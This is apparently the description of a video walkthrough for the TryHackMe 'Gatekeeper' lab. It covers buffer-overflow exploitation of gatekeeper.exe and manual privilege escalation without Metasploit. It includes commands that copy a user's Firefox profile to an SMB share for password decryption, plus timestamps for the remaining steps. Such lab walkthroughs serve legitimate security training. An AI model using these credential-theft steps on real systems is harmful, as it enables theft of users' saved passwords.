Gatekeeper | TryHackMe | Without Metasploit

Reverse engineering gatekeeper.exe with Immunity Debugger and Mona. Then exploiting it with Buffer Overflow. Then we manually escalate privilege without metasploit. Commands cheatsheet: On Target Windows: xcopy "C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release" "C:\Users\Share\firefox" /E /I I recommend typing \firefox on destination file to keep the copy tidy. Mount an SMB share: sudo mount -t cifs //TargetSMBIP/Users share(Name of your folder) -o 'rw,username=guest' Fire decrypt by Unode on Github: https://github[.]com/unode/firefox_decrypt Room: https://tryhackme.com/r/room/gatekeeper Buffer Overflow Prep Room: https://tryhackme.com/r/room/bufferoverflowprep Buffer Overflow guide by @TCMSecurityAcademy : https://www.youtube.com/watch?v=ncBblM920jw Background Music: Creator Mix Mellow - https://creatormix.com/album/mellow-61.html Mellow 2 - https://creatormix.com/album/mellow-two-78.html Tryhackme: https://tryhackme.com/p/Bsaro LinkedIn: https://www.linkedin.com/in/babyka-saroeun/ 0:00 - Intro 1:39 - Nmap & Tips to do bufferoverflow 5:08 - SMB Enumeration 8:00 - Download gatekeeper.exe from to local Windows VM 10:40 - Store mona.py & setup Immunity Debugger 11:40 - Review Nmap result 12:40 - Fuzzing the executable 17:13 - Find EIP offset 21:00 - Find Badchars 28:28 - Find Jump point & Configure exploit.py and do buffer overflow 29:33 - Buffer Overflow exploit to target machine & Windows enumeration 32:15 - Follow the room to find possible escalation vector 33:20 - Looking at Firefox profile 35:50 - Mount SMB to local Kali 38:00 - Manually copy Firefox profile to SMB share 39:05 - Decrypt Firefox hashes to find Credential 42:40 - Connect with credential on Impacket Psexec 45:00 - Xfreerdp with credential 47:55 - Quick explanation for metasploit (No Demo) & Rambling about the update